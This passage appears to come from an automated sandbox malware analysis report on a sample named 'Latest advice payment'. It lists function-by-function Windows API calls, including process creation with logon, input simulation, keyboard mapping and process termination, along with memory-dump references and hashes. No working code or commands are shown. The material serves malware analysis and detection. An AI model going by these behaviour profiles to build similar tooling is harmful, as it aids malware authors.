                                                            • Instruction Fuzzy Hash: C441C130100B119FDB20DF25DC88FBA7FE9FB59324F084668F5A58B2A1CB709845DB61
                                                            Function 005EB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(006257B0,00000000,01076498,?,?,006257B0,?,005EB5A8,?,?), ref: 005EB712
                                                            • EnableWindow.USER32(00000000,00000000), ref: 005EB736
                                                            • ShowWindow.USER32(006257B0,00000000,01076498,?,?,006257B0,?,005EB5A8,?,?), ref: 005EB796
                                                            • ShowWindow.USER32(00000000,00000004,?,005EB5A8,?,?), ref: 005EB7A8
                                                            • EnableWindow.USER32(00000000,00000001), ref: 005EB7CC
                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 005EB7EF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID:
                                                            • API String ID: 642888154-0
                                                            • Opcode ID: edfacf0dd637b63e679ea2bd284fcf2a4f81808142ba943426df687a43a59520
                                                            • Instruction ID: fbc74f850393a74c9088a2bca5912280ca33b320070b4855a9f2d8aeb90f6273
                                                            • Opcode Fuzzy Hash: edfacf0dd637b63e679ea2bd284fcf2a4f81808142ba943426df687a43a59520
                                                            • Instruction Fuzzy Hash: B9418374600280AFEB29CF25C499B967FE1FF45311F1841B9F9C98FAA2C731A856CB51
                                                            Function 005D709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,005D4E41,?,?,00000000,00000001), ref: 005D70AC
                                                              • Part of subcall function 005D39A0: GetWindowRect.USER32(?,?), ref: 005D39B3
                                                            • GetDesktopWindow.USER32 ref: 005D70D6
                                                            • GetWindowRect.USER32(00000000), ref: 005D70DD
                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 005D710F
                                                              • Part of subcall function 005C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005C52BC
                                                            • GetCursorPos.USER32(?), ref: 005D713B
                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 005D7199
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                            • String ID:
                                                            • API String ID: 4137160315-0
                                                            • Opcode ID: 877dd835c048372114deffc38c194c52f3136e4693034e11b36bd252fb828ba8
                                                            • Instruction ID: ec909b833668afd76fc0cc3ea3129079ddcefb526ed1ac4aca107eb63da9a302
                                                            • Opcode Fuzzy Hash: 877dd835c048372114deffc38c194c52f3136e4693034e11b36bd252fb828ba8
                                                            • Instruction Fuzzy Hash: 2E31D47250534AAFD724DF54C849F5BBBEAFF98314F00091AF5859B291DB30EA09CB92
                                                            Function 005B8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005B80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005B80C0
                                                              • Part of subcall function 005B80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005B80CA
                                                              • Part of subcall function 005B80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005B80D9
                                                              • Part of subcall function 005B80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005B80E0
                                                              • Part of subcall function 005B80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005B80F6
                                                            • GetLengthSid.ADVAPI32(?,00000000,005B842F), ref: 005B88CA
                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 005B88D6
                                                            • HeapAlloc.KERNEL32(00000000), ref: 005B88DD
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 005B88F6
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,005B842F), ref: 005B890A
                                                            • HeapFree.KERNEL32(00000000), ref: 005B8911
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 3008561057-0
                                                            • Opcode ID: fe26bc9fec9c3cdae5fecc201c07918a29058fe64dc85a9432075f35b360cc23
                                                            • Instruction ID: 469f50ad5b037b3a78b7393c82a5cb491065e575352d37df9173be64ca51b153
                                                            • Opcode Fuzzy Hash: fe26bc9fec9c3cdae5fecc201c07918a29058fe64dc85a9432075f35b360cc23
                                                            • Instruction Fuzzy Hash: 86119D32501209FBDB199BA4DC49BFE7B6CFB85311F108428F88597150CB32AA04DB60
                                                            Function 005B85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005B85E2
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 005B85E9
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 005B85F8
                                                            • CloseHandle.KERNEL32(00000004), ref: 005B8603
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 005B8632
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 005B8646
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: 70a000ec12ff7c9b6343da4f306fc6c73bdc7bc63db79ff332be19360c7f3199
                                                            • Instruction ID: 1f0d38be641f291a2134d74dc7805379afbb35403a2bcc80cf00e3068b1297b0
                                                            • Opcode Fuzzy Hash: 70a000ec12ff7c9b6343da4f306fc6c73bdc7bc63db79ff332be19360c7f3199
                                                            • Instruction Fuzzy Hash: 60113872501249ABDF118FA4DD49BEA7BA9FB48304F044064FE45A61A0CA719E64EB60
                                                            Function 005BB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 005BB7B5
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 005BB7C6
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005BB7CD
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 005BB7D5
                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 005BB7EC
                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 005BB7FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 0f76632f44a172c2ea201d5a3eb72b665a9506f28f422f3931d55b534c10569d
                                                            • Instruction ID: 7476d98b8a9b36be5aa2ed2a95e2a88fd8fd0c8cbbb12d58132c23d2f676408d
                                                            • Opcode Fuzzy Hash: 0f76632f44a172c2ea201d5a3eb72b665a9506f28f422f3931d55b534c10569d
                                                            • Instruction Fuzzy Hash: D60188B5E00249BBEB105BA69C89A5EBFB8EB58311F004075FA04AB291DA709D00CF51
                                                            Function 00580162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00580193
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 0058019B
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 005801A6
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 005801B1
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 005801B9
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 005801C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: 704755af836baa9ce2189d76ec225742900c418ca7be20069d66ce1bab452e12
                                                            • Instruction ID: c2eee57039f780f6603e6a35d65219a9eafb9b989c3aa479e52185376e8a1900
                                                            • Opcode Fuzzy Hash: 704755af836baa9ce2189d76ec225742900c418ca7be20069d66ce1bab452e12
                                                            • Instruction Fuzzy Hash: 1B016CB09017597DE3008F5A8C85B52FFA8FF19354F00415BA15C4B941C7F5A868CBE5
                                                            Function 005C53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005C53F9
                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 005C540F
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 005C541E
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005C542D
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005C5437
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005C543E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: 28ca722f35b013fdbf6b3ec9aeb61c50b070dd059d2b14863190cbfa212661b2
                                                            • Instruction ID: ccadf5084e39fc9f0de25d4f9a2c1ee6dd33029b11c5b100df95b62ade962f29
                                                            • Opcode Fuzzy Hash: 28ca722f35b013fdbf6b3ec9aeb61c50b070dd059d2b14863190cbfa212661b2
                                                            • Instruction Fuzzy Hash: C7F06232140198BBD7295B92DC4DEAB7B7CEBD6B11F000169F944D50909BA01A05D7B5
                                                            Function 005C7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 005C7243
                                                            • EnterCriticalSection.KERNEL32(?,?,00570EE4,?,?), ref: 005C7254
                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00570EE4,?,?), ref: 005C7261
                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00570EE4,?,?), ref: 005C726E
                                                              • Part of subcall function 005C6C35: CloseHandle.KERNEL32(00000000,?,005C727B,?,00570EE4,?,?), ref: 005C6C3F
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 005C7281
                                                            • LeaveCriticalSection.KERNEL32(?,?,00570EE4,?,?), ref: 005C7288
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: d0d999ae9e7d37bc776ec4ebb1ea325ec89f5aaab4630fc4d3f0f035d3df1708
                                                            • Instruction ID: 0ba576c35f0c0369f4bbbfd9afd7b447c62c58d7c3f0474dd6171742cc3d9ada
                                                            • Opcode Fuzzy Hash: d0d999ae9e7d37bc776ec4ebb1ea325ec89f5aaab4630fc4d3f0f035d3df1708
                                                            • Instruction Fuzzy Hash: 8CF0BE3F440202EFD7191B64EC8CEEA3B29FF58302B010135F243980A0CF761904DB50
                                                            Function 005B8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005B899D
                                                            • UnloadUserProfile.USERENV(?,?), ref: 005B89A9
                                                            • CloseHandle.KERNEL32(?), ref: 005B89B2
                                                            • CloseHandle.KERNEL32(?), ref: 005B89BA
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 005B89C3
                                                            • HeapFree.KERNEL32(00000000), ref: 005B89CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: cb632c4d436449ea8575e54f2fa80187ad5822d7acadf0459142e78f67208627
                                                            • Instruction ID: 00f7102f7a74fc8eb7de05ac165f33e727ab7ec0f68cf12ff8ef3789995534db
                                                            • Opcode Fuzzy Hash: cb632c4d436449ea8575e54f2fa80187ad5822d7acadf0459142e78f67208627
                                                            • Instruction Fuzzy Hash: F0E0C236004045FBDA091FE1EC4C90ABB69FBA9322B108630F299890B0CF329468EB90
                                                            Function 005B7530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,005F2C7C,?), ref: 005B76EA
                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,005F2C7C,?), ref: 005B7702
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,005EFB80,000000FF,?,00000000,00000800,00000000,?,005F2C7C,?), ref: 005B7727
                                                            • _memcmp.LIBCMT ref: 005B7748
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FromProg$FreeTask_memcmp
                                                            • String ID: ,,_
                                                            • API String ID: 314563124-217268573
                                                            • Opcode ID: 0d2dcccb7dafc31cf6cf262f9ce2596a48d008bb90fa68e5a9bf5be4e9fd0f96
                                                            • Instruction ID: 7f999b20c627a42c2f16132f302f9ae54b8f06ad8fd846225b87e40e311bc4f4
                                                            • Opcode Fuzzy Hash: 0d2dcccb7dafc31cf6cf262f9ce2596a48d008bb90fa68e5a9bf5be4e9fd0f96
                                                            • Instruction Fuzzy Hash: AC81EE75A00109EFCB04DFA4C984EEEBBB9FF89315F204558F516AB250DB71AE06CB60
                                                            Function 005D85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 005D8613
                                                            • CharUpperBuffW.USER32(?,?), ref: 005D8722
                                                            • VariantClear.OLEAUT32(?), ref: 005D889A
                                                              • Part of subcall function 005C7562: VariantInit.OLEAUT32(00000000), ref: 005C75A2
                                                              • Part of subcall function 005C7562: VariantCopy.OLEAUT32(00000000,?), ref: 005C75AB
                                                              • Part of subcall function 005C7562: VariantClear.OLEAUT32(00000000), ref: 005C75B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: 551925513a32ee08fcd89a76c5df7fa1fe4b10a7b5b6ba5003b6f7c9344ca929
                                                            • Instruction ID: 6a6f6701b14fe3fddf4a2851f4e5bca2ba5290e4caa8c3d7ece0ac2fc4d1dfa7
                                                            • Opcode Fuzzy Hash: 551925513a32ee08fcd89a76c5df7fa1fe4b10a7b5b6ba5003b6f7c9344ca929
                                                            • Instruction Fuzzy Hash: 73915A756043029FC710DF28C48496ABBE8FFD9714F14896EF89A8B361DB31E945CB92
                                                            Function 005C2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0057FC86: _wcscpy.LIBCMT ref: 0057FCA9
                                                            • _memset.LIBCMT ref: 005C2B87
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005C2BB6
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005C2C69
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 005C2C97
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 4152858687-4108050209
                                                            • Opcode ID: e78f8f247ef4303bc584acadd219c4fca2cd80aab1bea2903239189ce49069a3
                                                            • Instruction ID: dce2fc359c927546cb184ad27dd13d0b9722939ee05c05daaa3daccbdfac6c8f
                                                            • Opcode Fuzzy Hash: e78f8f247ef4303bc584acadd219c4fca2cd80aab1bea2903239189ce49069a3
                                                            • Instruction Fuzzy Hash: 89519D71608301AED725AEA8D849F6FBFE8BF99314F040A2DF895D7190DB70CD449B52
                                                            Function 00573137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_free
                                                            • String ID: 3cW$_W
                                                            • API String ID: 2620147621-1067530677
                                                            • Opcode ID: 0c2207383ae2564e470a92d7258247c7ea9859d59450dcdc497e4bba15dc7b5e
                                                            • Instruction ID: 5cc37cd2d85dc156a069a7ed4b694cbd38582a3adeec11b61070bcd8f150ff3a
                                                            • Opcode Fuzzy Hash: 0c2207383ae2564e470a92d7258247c7ea9859d59450dcdc497e4bba15dc7b5e
                                                            • Instruction Fuzzy Hash: E8516A716047418FDB29DF28D484B6FBBE5BFC5320F48882DE98997251EB31E905DB42
                                                            Function 00576192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memset$_memmove
                                                            • String ID: 3cW$ERCP
                                                            • API String ID: 2532777613-2184803303
                                                            • Opcode ID: 03584a369c5ccaf64a9c4141a51378a25f17b94a9b3e91a20a103e2c5614676a
                                                            • Instruction ID: 0330c704a34ef6a9ebec6f9fe5f6dbf00064a2a0814d723cf45db273d66ca25c
                                                            • Opcode Fuzzy Hash: 03584a369c5ccaf64a9c4141a51378a25f17b94a9b3e91a20a103e2c5614676a
                                                            • Instruction Fuzzy Hash: 06519C70900B06DFDB24CF65D885BEBBFE4BF44304F20896AE84AD7281E770AA44DB50
                                                            Function 005C2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 005C27C0
                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 005C27DC
                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 005C2822
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00625890,00000000), ref: 005C286B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
